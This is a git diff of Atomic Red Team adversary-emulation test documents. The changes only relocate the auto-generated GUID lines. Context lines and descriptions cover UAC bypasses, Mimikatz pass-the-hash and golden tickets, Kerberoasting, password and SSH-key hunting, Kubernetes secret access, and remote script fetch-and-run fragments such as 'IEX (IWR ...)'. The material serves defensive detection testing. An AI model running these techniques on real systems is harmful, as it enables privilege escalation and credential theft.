## Atomic Test #3 - Bypass UAC using Fodhelper - -auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 - Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened. + **Supported Platforms:** Windows +**auto_generated_guid:** 58f641ea-12e3-499a-b684-44dee46bd182 + + + #### Inputs: @@ -147,14 +153,16 @@ reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1
## Atomic Test #4 - Bypass UAC using Fodhelper - PowerShell - -auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa - PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. Upon execution command prompt will be opened. + **Supported Platforms:** Windows +**auto_generated_guid:** 3f627297-6c38-4e7d-a278-fc2563eaaeaa + + + #### Inputs: @@ -186,14 +194,16 @@ Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ig
## Atomic Test #5 - Bypass UAC using ComputerDefaults (PowerShell) - -auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f - PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10 Upon execution administrative command prompt should open + **Supported Platforms:** Windows +**auto_generated_guid:** 3c51abf2-44bf-42d8-9111-dc96ff66750f + + + #### Inputs: @@ -225,14 +235,16 @@ Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ig
## Atomic Test #6 - Bypass UAC by Mocking Trusted Directories - -auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1 - Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch + **Supported Platforms:** Windows +**auto_generated_guid:** f7a35090-6f7f-4f64-bb47-d657bf5b10c1 + + + #### Inputs: @@ -264,16 +276,18 @@ del "c:\testbypass.exe" >nul 2>nul
## Atomic Test #7 - Bypass UAC using sdclt DelegateExecute - -auto_generated_guid: 3be891eb-4608-4173-87e8-78b494c029b7 - Bypasses User Account Control using a fileless method, registry only. Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe [Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass) Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1) + **Supported Platforms:** Windows +**auto_generated_guid:** 3be891eb-4608-4173-87e8-78b494c029b7 + + + #### Inputs: @@ -305,14 +319,16 @@ Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction I
## Atomic Test #8 - Disable UAC using reg.exe - -auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 - Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 + **Supported Platforms:** Windows +**auto_generated_guid:** 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 + + + @@ -336,9 +352,6 @@ reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v En
## Atomic Test #9 - Bypass UAC using SilentCleanup task - -auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608 - Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/ There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level). @@ -350,9 +363,14 @@ And forcefully run SilentCleanup task: schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs. + **Supported Platforms:** Windows +**auto_generated_guid:** 28104f8a-4ff1-4582-bcf6-699dce156608 + + + #### Inputs: diff --git a/atomics/T1548.003/T1548.003.md b/atomics/T1548.003/T1548.003.md index 6188a9e6..7e3aeca4 100644 --- a/atomics/T1548.003/T1548.003.md +++ b/atomics/T1548.003/T1548.003.md @@ -22,13 +22,15 @@ In the wild, malware has disabled tty_tickets to potentially make s
## Atomic Test #1 - Sudo usage - -auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e - Common Sudo enumeration methods. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e + + + @@ -50,13 +52,15 @@ sudo vim /etc/sudoers
## Atomic Test #2 - Unlimited sudo cache timeout - -auto_generated_guid: a7b17659-dd5e-46f7-b7d1-e6792c91d0bc - Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** a7b17659-dd5e-46f7-b7d1-e6792c91d0bc + + + @@ -77,13 +81,15 @@ sudo visudo -c -f /etc/sudoers
## Atomic Test #3 - Disable tty_tickets for sudo caching - -auto_generated_guid: 91a60b03-fb75-4d24-a42e-2eb8956e8de1 - Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 91a60b03-fb75-4d24-a42e-2eb8956e8de1 + + + diff --git a/atomics/T1550.002/T1550.002.md b/atomics/T1550.002/T1550.002.md index 1c8d7ebe..d0fc6f04 100644 --- a/atomics/T1550.002/T1550.002.md +++ b/atomics/T1550.002/T1550.002.md @@ -16,14 +16,16 @@ Adversaries may also use stolen password hashes to "overpass the hash." Similar
## Atomic Test #1 - Mimikatz Pass the Hash - -auto_generated_guid: ec23cef9-27d9-46e4-a68d-6f75f7b86908 - Note: must dump hashes first [Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth) + **Supported Platforms:** Windows +**auto_generated_guid:** ec23cef9-27d9-46e4-a68d-6f75f7b86908 + + + #### Inputs: @@ -68,13 +70,15 @@ Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
## Atomic Test #2 - crackmapexec Pass the Hash - -auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 - command execute with crackmapexec + **Supported Platforms:** Windows +**auto_generated_guid:** eb05b028-16c8-4ad8-adea-6f5b219da9a9 + + + #### Inputs: diff --git a/atomics/T1550.003/T1550.003.md b/atomics/T1550.003/T1550.003.md index 4b9d9a7b..b7dff150 100644 --- a/atomics/T1550.003/T1550.003.md +++ b/atomics/T1550.003/T1550.003.md @@ -18,13 +18,15 @@ Adversaries may also create a valid Kerberos ticket using other user information
## Atomic Test #1 - Mimikatz Kerberos Ticket Attack - -auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 - Similar to PTH, but attacking Kerberos + **Supported Platforms:** Windows +**auto_generated_guid:** dbf38128-7ba7-4776-bedf-cc2eed432098 + + + #### Inputs: diff --git a/atomics/T1552.001/T1552.001.md b/atomics/T1552.001/T1552.001.md index edb84410..6761c411 100644 --- a/atomics/T1552.001/T1552.001.md +++ b/atomics/T1552.001/T1552.001.md @@ -22,13 +22,15 @@ In cloud and/or containerized environments, authenticated user and service accou
## Atomic Test #1 - Extract Browser and System credentials with LaZagne - -auto_generated_guid: 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 - [LaZagne Source](https://github.com/AlessandroZ/LaZagne) + **Supported Platforms:** macOS +**auto_generated_guid:** 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 + + + @@ -48,13 +50,15 @@ python2 laZagne.py all
## Atomic Test #2 - Extract passwords with grep - -auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4 - Extracting credentials from files + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** bd4cf0d1-7646-474e-8610-78ccf5a097c4 + + + #### Inputs: @@ -79,13 +83,15 @@ grep -ri password #{file_path}
## Atomic Test #3 - Extracting passwords with findstr - -auto_generated_guid: 0e56bf29-ff49-4ea5-9af4-3b81283fd513 - Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 0e56bf29-ff49-4ea5-9af4-3b81283fd513 + + + @@ -106,14 +112,16 @@ ls -R | select-string -Pattern password
## Atomic Test #4 - Access unattend.xml - -auto_generated_guid: 367d4004-5fc0-446d-823f-960c74ae52c3 - Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process. + **Supported Platforms:** Windows +**auto_generated_guid:** 367d4004-5fc0-446d-823f-960c74ae52c3 + + + @@ -134,13 +142,15 @@ type C:\Windows\Panther\Unattend\unattend.xml
## Atomic Test #5 - Find and Access Github Credentials - -auto_generated_guid: da4f751a-020b-40d7-b9ff-d433b7799803 - This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** da4f751a-020b-40d7-b9ff-d433b7799803 + + + diff --git a/atomics/T1552.002/T1552.002.md b/atomics/T1552.002/T1552.002.md index 4dcc1d70..a4fb96e6 100644 --- a/atomics/T1552.002/T1552.002.md +++ b/atomics/T1552.002/T1552.002.md @@ -17,13 +17,15 @@ Example commands to find Registry keys related to password information: (Citatio
## Atomic Test #1 - Enumeration for Credentials in Registry - -auto_generated_guid: b6ec082c-7384-46b3-a111-9a9b8b14e5e7 - Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** b6ec082c-7384-46b3-a111-9a9b8b14e5e7 + + + @@ -44,14 +46,16 @@ reg query HKCU /f password /t REG_SZ /s
## Atomic Test #2 - Enumeration for PuTTY Credentials in Registry - -auto_generated_guid: af197fd7-e868-448e-9bd5-05d1bcd9d9e5 - Queries to enumerate for PuTTY credentials in the Registry. PuTTY must be installed for this test to work. If any registry entries are found, they will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** af197fd7-e868-448e-9bd5-05d1bcd9d9e5 + + + diff --git a/atomics/T1552.003/T1552.003.md b/atomics/T1552.003/T1552.003.md index eecb4da5..ff2377b5 100644 --- a/atomics/T1552.003/T1552.003.md +++ b/atomics/T1552.003/T1552.003.md @@ -10,13 +10,15 @@
## Atomic Test #1 - Search Through Bash History - -auto_generated_guid: 3cfde62b-7c33-4b26-a61e-755d6131c8ce - Search through bash history for specifice commands we want to capture + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 3cfde62b-7c33-4b26-a61e-755d6131c8ce + + + #### Inputs: diff --git a/atomics/T1552.004/T1552.004.md b/atomics/T1552.004/T1552.004.md index 2f1e6642..8780b653 100644 --- a/atomics/T1552.004/T1552.004.md +++ b/atomics/T1552.004/T1552.004.md @@ -22,14 +22,16 @@ Some private keys require a password or passphrase for operation, so an adversar
## Atomic Test #1 - Private Keys - -auto_generated_guid: 520ce462-7ca7-441e-b5a5-f8347f632696 - Find private keys on the Windows file system. File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc + **Supported Platforms:** Windows +**auto_generated_guid:** 520ce462-7ca7-441e-b5a5-f8347f632696 + + + @@ -49,13 +51,15 @@ dir c:\ /b /s .key | findstr /e .key
## Atomic Test #2 - Discover Private SSH Keys - -auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878 - Discover private SSH keys on a macOS or Linux system. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 46959285-906d-40fa-9437-5a439accd878 + + + #### Inputs: @@ -86,13 +90,15 @@ rm #{output_file}
## Atomic Test #3 - Copy Private SSH Keys with CP - -auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3 - Copy private SSH keys on a Linux system to a staging folder using the `cp` command. + **Supported Platforms:** Linux +**auto_generated_guid:** 7c247dc7-5128-4643-907b-73a76d9135c3 + + + #### Inputs: @@ -124,13 +130,15 @@ rm #{output_folder}
## Atomic Test #4 - Copy Private SSH Keys with rsync - -auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a - Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 864bb0b2-6bb5-489a-b43b-a77b3a16d68a + + + #### Inputs: diff --git a/atomics/T1552.006/T1552.006.md b/atomics/T1552.006/T1552.006.md index dbbe2d71..718e21a9 100644 --- a/atomics/T1552.006/T1552.006.md +++ b/atomics/T1552.006/T1552.006.md @@ -23,13 +23,15 @@ On the SYSVOL share, adversaries may use the following command to enumerate pote
## Atomic Test #1 - GPP Passwords (findstr) - -auto_generated_guid: 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f - Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. + **Supported Platforms:** Windows +**auto_generated_guid:** 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f + + + @@ -61,17 +63,19 @@ Write-Host Joining this computer to a domain must be done manually
## Atomic Test #2 - GPP Passwords (Get-GPPPassword) - -auto_generated_guid: e9584f82-322c-474a-b831-940fd8b4455c - Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This test is intended to be run from a domain joined workstation, not on the Domain Controller itself. The Get-GPPPasswords.ps1 executed during this test can be obtained using the get-prereq_commands. Successful test execution will either display the credentials found in the GPP files or indicate "No preference files found". + **Supported Platforms:** Windows +**auto_generated_guid:** e9584f82-322c-474a-b831-940fd8b4455c + + + #### Inputs: diff --git a/atomics/T1552.007/T1552.007.md b/atomics/T1552.007/T1552.007.md index d0d3f03b..9bcf155c 100644 --- a/atomics/T1552.007/T1552.007.md +++ b/atomics/T1552.007/T1552.007.md @@ -14,13 +14,15 @@ An adversary may access the Docker API to collect logs that contain credentials
## Atomic Test #1 - ListSecrets - -auto_generated_guid: 43c3a49d-d15c-45e6-b303-f6e177e44a9a - A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 43c3a49d-d15c-45e6-b303-f6e177e44a9a + + + #### Inputs: @@ -45,13 +47,15 @@ kubectl get secrets -n #{namespace}
## Atomic Test #2 - Cat the contents of a Kubernetes service account token file - -auto_generated_guid: 788e0019-a483-45da-bcfe-96353d46820f - Access the Kubernetes service account access token stored within a container in a cluster. + **Supported Platforms:** Linux +**auto_generated_guid:** 788e0019-a483-45da-bcfe-96353d46820f + + + diff --git a/atomics/T1553.001/T1553.001.md b/atomics/T1553.001/T1553.001.md index 380c0107..82a30cb0 100644 --- a/atomics/T1553.001/T1553.001.md +++ b/atomics/T1553.001/T1553.001.md @@ -14,13 +14,15 @@ In typical operation, a file will be downloaded from the internet and given a qu
## Atomic Test #1 - Gatekeeper Bypass - -auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b - Gatekeeper Bypass via command line + **Supported Platforms:** macOS +**auto_generated_guid:** fb3d46c6-9480-4803-8d7d-ce676e1f1a9b + + + #### Inputs: diff --git a/atomics/T1553.004/T1553.004.md b/atomics/T1553.004/T1553.004.md index 182abaad..c1386bca 100644 --- a/atomics/T1553.004/T1553.004.md +++ b/atomics/T1553.004/T1553.004.md @@ -26,13 +26,15 @@ In macOS, the Ay MaMi malware uses /usr/bin/security add-trusted-cert -d -
## Atomic Test #1 - Install root CA on CentOS/RHEL - -auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e - Creates a root CA with openssl + **Supported Platforms:** Linux +**auto_generated_guid:** 9c096ec4-fd42-419d-a762-d64cc950627e + + + #### Inputs: @@ -67,13 +69,15 @@ fi
## Atomic Test #2 - Install root CA on Debian/Ubuntu - -auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff - Creates a root CA with openssl + **Supported Platforms:** Linux +**auto_generated_guid:** 53bcf8a0-1549-4b85-b919-010c56d724ff + + + #### Inputs: @@ -113,13 +117,15 @@ openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=U
## Atomic Test #3 - Install root CA on macOS - -auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 - Creates a root CA with openssl + **Supported Platforms:** macOS +**auto_generated_guid:** cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 + + + #### Inputs: @@ -158,13 +164,15 @@ openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=U
## Atomic Test #4 - Install root CA on Windows - -auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 - Creates a root CA with Powershell + **Supported Platforms:** Windows +**auto_generated_guid:** 76f49d86-5eb1-461a-a032-a480f86652f1 + + + #### Inputs: @@ -215,13 +223,15 @@ Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item
## Atomic Test #5 - Install root CA on Windows with certutil - -auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f - Creates a root CA with certutil + **Supported Platforms:** Windows +**auto_generated_guid:** 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f + + + #### Inputs: diff --git a/atomics/T1553.005/T1553.005.md b/atomics/T1553.005/T1553.005.md index fc2bed9c..805a501a 100644 --- a/atomics/T1553.005/T1553.005.md +++ b/atomics/T1553.005/T1553.005.md @@ -14,13 +14,15 @@ Adversaries may abuse container files such as compressed/archive (.arj, .gzip) a
## Atomic Test #1 - Mount ISO image - -auto_generated_guid: 002cca30-4778-4891-878a-aaffcfa502fa - Mounts ISO image downloaded from internet to evade Mark-of-the-Web. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, and mount the image. The provided sample ISO simply has a Reports shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ + **Supported Platforms:** Windows +**auto_generated_guid:** 002cca30-4778-4891-878a-aaffcfa502fa + + + #### Inputs: @@ -62,15 +64,17 @@ Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/
## Atomic Test #2 - Mount an ISO image and run executable from the ISO - -auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc - Mounts an ISO image downloaded from internet to evade Mark-of-the-Web and run hello.exe executable from the ISO. Upon successful execution, powershell will download the .iso from the Atomic Red Team repo, mount the image, and run the executable from the ISO image that will open command prompt echoing "Hello, World!". ISO provided by:https://twitter.com/mattifestation/status/1398323532988399620 Reference:https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/, + **Supported Platforms:** Windows +**auto_generated_guid:** 42f22b00-0242-4afc-a61b-0da05041f9cc + + + #### Inputs: diff --git a/atomics/T1555.001/T1555.001.md b/atomics/T1555.001/T1555.001.md index bdc572de..76b62aaf 100644 --- a/atomics/T1555.001/T1555.001.md +++ b/atomics/T1555.001/T1555.001.md @@ -12,9 +12,6 @@ To manage their credentials, users have to use additional credentials to access
## Atomic Test #1 - Keychain - -auto_generated_guid: 1864fdec-ff86-4452-8c30-f12507582a93 - ### Keychain Files ~/Library/Keychains/ @@ -26,9 +23,14 @@ auto_generated_guid: 1864fdec-ff86-4452-8c30-f12507582a93 [Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html) [Keychain dumper](https://github.com/juuso/keychaindump) + **Supported Platforms:** macOS +**auto_generated_guid:** 1864fdec-ff86-4452-8c30-f12507582a93 + + + #### Inputs: diff --git a/atomics/T1555.003/T1555.003.md b/atomics/T1555.003/T1555.003.md index b460c84c..d780ed3d 100644 --- a/atomics/T1555.003/T1555.003.md +++ b/atomics/T1555.003/T1555.003.md @@ -22,17 +22,19 @@ After acquiring credentials from web browsers, adversaries may attempt to recycl
## Atomic Test #1 - Run Chrome-password Collector - -auto_generated_guid: 8c05b133-d438-47ca-a630-19cc464c4622 - A modified sysinternals suite will be downloaded and staged. The Chrome-password collector, renamed accesschk.exe, will then be executed from #{file_path}. Successful execution will produce stdout message stating "Copying db ... passwordsDB DB Opened. statement prepare DB connection closed properly". Upon completion, final output will be a file modification of $env:TEMP\sysinternals\passwordsdb. Adapted from [MITRE ATTACK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/credential-access/e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d.yml) + **Supported Platforms:** Windows +**auto_generated_guid:** 8c05b133-d438-47ca-a630-19cc464c4622 + + + #### Inputs: @@ -77,15 +79,17 @@ Remove-Item #{file_path}\Modified-SysInternalsSuite.zip -Force
## Atomic Test #2 - Search macOS Safari Cookies - -auto_generated_guid: c1402f7b-67ca-43a8-b5f3-3143abedc01b - This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware. Upon successful execution, MacOS shell will cd to `~/Libraries/Cookies` and grep for `Cookies.binarycookies`. + **Supported Platforms:** macOS +**auto_generated_guid:** c1402f7b-67ca-43a8-b5f3-3143abedc01b + + + #### Inputs: @@ -111,14 +115,16 @@ grep -q "#{search_string}" "Cookies.binarycookies"
## Atomic Test #3 - LaZagne - Credentials from Browser - -auto_generated_guid: 9a2915b3-3954-4cce-8c76-00fbf4dbd014 - The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne) to extract passwords from browsers on the Windows operating system. LaZagne is an open source application used to retrieve passwords stored on a local computer. + **Supported Platforms:** Windows +**auto_generated_guid:** 9a2915b3-3954-4cce-8c76-00fbf4dbd014 + + + #### Inputs: diff --git a/atomics/T1555/T1555.md b/atomics/T1555/T1555.md index 3e333580..24135db4 100644 --- a/atomics/T1555/T1555.md +++ b/atomics/T1555/T1555.md @@ -14,14 +14,16 @@
## Atomic Test #1 - Extract Windows Credential Manager via VBA - -auto_generated_guid: 234f9b7c-b53d-4f32-897b-b880a6c9ea7b - This module will extract the credentials found within the Windows credential manager and dump them to $env:TEMP\windows-credentials.txt + **Supported Platforms:** Windows +**auto_generated_guid:** 234f9b7c-b53d-4f32-897b-b880a6c9ea7b + + + @@ -64,13 +66,15 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir
## Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] - -auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3 - This module will extract the credentials from Windows Credential Manager + **Supported Platforms:** Windows +**auto_generated_guid:** c89becbe-1758-4e7d-a0f4-97d2188a23e3 + + + @@ -90,13 +94,15 @@ IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/
## Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials] - -auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240 - This module will extract the credentials from Windows Credential Manager + **Supported Platforms:** Windows +**auto_generated_guid:** 8fd5a296-6772-4766-9991-ff4e92af7240 + + + diff --git a/atomics/T1556.002/T1556.002.md b/atomics/T1556.002/T1556.002.md index 807c98bc..19efee24 100644 --- a/atomics/T1556.002/T1556.002.md +++ b/atomics/T1556.002/T1556.002.md @@ -14,13 +14,15 @@ Adversaries can register malicious password filters to harvest credentials from
## Atomic Test #1 - Install and Register Password Filter DLL - -auto_generated_guid: a7961770-beb5-4134-9674-83d7e1fa865c - Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. + **Supported Platforms:** Windows +**auto_generated_guid:** a7961770-beb5-4134-9674-83d7e1fa865c + + + #### Inputs: diff --git a/atomics/T1558.001/T1558.001.md b/atomics/T1558.001/T1558.001.md index ba58dac9..c08b28e8 100644 --- a/atomics/T1558.001/T1558.001.md +++ b/atomics/T1558.001/T1558.001.md @@ -14,15 +14,17 @@ The KDC service runs all on domain controllers that are part of an Active Direct
## Atomic Test #1 - Crafting golden tickets with mimikatz - -auto_generated_guid: 9726592a-dabc-4d4d-81cd-44070008b3af - Once the hash of the special krbtgt user is retrieved it is possible to craft Kerberos Ticket Granting Ticket impersonating any user in the domain. This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769). The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session. + **Supported Platforms:** Windows +**auto_generated_guid:** 9726592a-dabc-4d4d-81cd-44070008b3af + + + #### Inputs: diff --git a/atomics/T1558.003/T1558.003.md b/atomics/T1558.003/T1558.003.md index c33a6ec5..a3155891 100644 --- a/atomics/T1558.003/T1558.003.md +++ b/atomics/T1558.003/T1558.003.md @@ -18,18 +18,20 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003)
## Atomic Test #1 - Request for service tickets - -auto_generated_guid: 3f987809-3681-43c8-bcd8-b3ff3a28533a - This test uses the Powershell Empire Module: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1 The following are further sources and credits for this attack: [Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/) [Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/) when executed successfully , the test displays available services with their hashes. If the testing domain doesn't have any service principal name configured, there is no output + **Supported Platforms:** Windows +**auto_generated_guid:** 3f987809-3681-43c8-bcd8-b3ff3a28533a + + + diff --git a/atomics/T1559.002/T1559.002.md b/atomics/T1559.002/T1559.002.md index 1e38d8cb..e7a4580a 100644 --- a/atomics/T1559.002/T1559.002.md +++ b/atomics/T1559.002/T1559.002.md @@ -18,13 +18,15 @@ Microsoft Office documents can be poisoned with DDE commands (Citation: SensePos
## Atomic Test #1 - Execute Commands - -auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd - Executes commands via DDE using Microsfot Word + **Supported Platforms:** Windows +**auto_generated_guid:** f592ba2a-e9e8-4d62-a459-ef63abd819fd + + + #### Run it with these steps! @@ -50,13 +52,15 @@ The Field Code should now be displayed, change it to Contain the following:
## Atomic Test #2 - Execute PowerShell script via Word DDE - -auto_generated_guid: 47c21fb6-085e-4b0d-b4d2-26d72c3830b3 - When the word document opens it will prompt the user to click ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script + **Supported Platforms:** Windows +**auto_generated_guid:** 47c21fb6-085e-4b0d-b4d2-26d72c3830b3 + + + @@ -76,9 +80,6 @@ start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx
## Atomic Test #3 - DDEAUTO - -auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181 - TrustedSec - Unicorn - https://github.com/trustedsec/unicorn SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ @@ -86,9 +87,14 @@ SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-mswo Word VBA Macro [Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail) + **Supported Platforms:** Windows +**auto_generated_guid:** cf91174c-4e74-414e-bec0-8d60a104d181 + + + #### Run it with these steps! diff --git a/atomics/T1560.001/T1560.001.md b/atomics/T1560.001/T1560.001.md index 17ca1c97..a376ff85 100644 --- a/atomics/T1560.001/T1560.001.md +++ b/atomics/T1560.001/T1560.001.md @@ -26,14 +26,16 @@ Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS o
## Atomic Test #1 - Compress Data for Exfiltration With Rar - -auto_generated_guid: 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 - An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. When the test completes you should find the txt files from the %USERPROFILE% directory compressed in a file called T1560.001-data.rar in the %USERPROFILE% directory + **Supported Platforms:** Windows +**auto_generated_guid:** 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 + + + #### Inputs: @@ -80,14 +82,16 @@ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-ra
## Atomic Test #2 - Compress Data and lock with password for Exfiltration with winrar - -auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c - Note: Requires winrar installation rar a -p"blue" hello.rar (VARIANT) + **Supported Platforms:** Windows +**auto_generated_guid:** 8dd61a55-44c6-43cc-af0c-8bdda276860c + + + #### Inputs: @@ -131,14 +135,16 @@ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-ra
## Atomic Test #3 - Compress Data and lock with password for Exfiltration with winzip - -auto_generated_guid: 01df0353-d531-408d-a0c5-3161bf822134 - Note: Requires winzip installation wzzip sample.zip -s"blueblue" *.txt (VARIANT) + **Supported Platforms:** Windows +**auto_generated_guid:** 01df0353-d531-408d-a0c5-3161bf822134 + + + #### Inputs: @@ -185,13 +191,15 @@ if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_h
## Atomic Test #4 - Compress Data and lock with password for Exfiltration with 7zip - -auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198 - Note: Requires 7zip installation + **Supported Platforms:** Windows +**auto_generated_guid:** d1334303-59cb-4a03-8313-b3e24d02c198 + + + #### Inputs: @@ -235,13 +243,15 @@ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.
